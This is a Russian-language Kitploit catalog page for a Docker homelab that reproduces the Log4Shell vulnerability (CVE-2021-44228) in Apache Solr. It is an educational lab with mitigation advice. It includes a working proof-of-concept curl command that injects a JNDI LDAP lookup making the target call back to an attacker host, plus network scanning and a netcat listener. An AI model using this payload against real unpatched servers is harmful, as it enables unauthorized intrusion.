Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
homelab-CVE-2021-44228 — Log4j уязвимость homelab | Kitploit
Инструменты/GitHubGitHub/ricardo354/homelab-cve-2021-44228
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubricardo354/homelab-cve-2021-44228

homelab-CVE-2021-44228

Log4j уязвимость homelab

Репозиторий
41 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Homelab: Log4Shell (CVE-2021-44228) на Apache Solr

Управляемая среда в Docker для воспроизведения и изучения уязвимости Log4Shell в Apache Solr.

Среда

  • Цель (solr-lab): Apache Solr v8.11.0 (vulhub/solr:8.11.0) с уязвимой версией Log4j.
  • Атакующий (kali-lab): Базовый контейнер Kali Linux с предустановленными nmap, curl и netcat.

Как запустить лабораторию

1. Запуск контейнеров

В терминале запустите окружение в фоновом режиме:

root@kitploit:~
docker compose up -d --build

2. Вход в Kali (контейнер атакующего)

root@kitploit:~
docker compose exec -it kali-lab /bin/bash

3. Определение внутренней сети

Внутри контейнера Kali узнайте свою подсеть и найдите IP-адрес Apache Solr:

root@kitploit:~
# 1. Посмотрите свой IP и маску сети
hostname -I

# 2. Просканируйте внутреннюю сеть для поиска IP цели (порт Solr: 8983)
# (Замените подсеть ниже на ту, что вы получили из предыдущей команды)
nmap -p 8983 172.20.0.0/24


Запуск PoC (Proof of Concept)

Скрипт poc.sh внедряет полезную нагрузку JNDI lookup в параметр API администрирования Solr.

Скрипт (poc.sh)

root@kitploit:~
#!/usr/bin/env bash

if [ "$#" -lt 2 ]; then
    echo "Использование: $0 <lhost> <rhost> [lport]"
    echo "Пример: $0 172.20.0.3 172.20.0.2 1389"
    exit 1
fi

KALI="$1"
TARGET="$2"
PORT_KALI="${3:-1389}"

echo "[*] Цель: $TARGET"
echo "[*] Атакующий (LDAP): $KALI на порту $PORT_KALI"
echo "[*] Запуск эксплойта..."

curl -g -v "http://${TARGET}:8983/solr/admin/cores?foo=\${jndi:ldap://${KALI}:${PORT_KALI}/x}"

Выполнение

Всё ещё внутри Kali, дайте скрипту права на выполнение и запустите, указав правильные IP-адреса:

root@kitploit:~
chmod +x poc.sh
./poc.sh <IP_КАЛИ> <IP_SOLR> 1389

Что здесь происходит? Solr обработает запрос и попытается открыть LDAP-соединение обратно к IP-адресу Kali на указанном порту. Вы можете отслеживать эту попытку подключения, предварительно открыв быстрый слушатель в Kali (например: nc -lnvp 1389).


Меры по смягчению

Чтобы исправить ошибку в Log4j 2:

  • Обновление: Переход на безопасные версии библиотеки (выше 2.15.0 или 2.17.1).
  • JVM Format Msg: В версиях от 2.10 до 2.14.1 отключите lookups, добавив флаг -Dlog4j2.formatMsgNoLookups=true при запуске Java.
  • Удаление класса: Вручную удалите проблемный класс из jar-файла, если обновление невозможно:
root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Скачать инструмент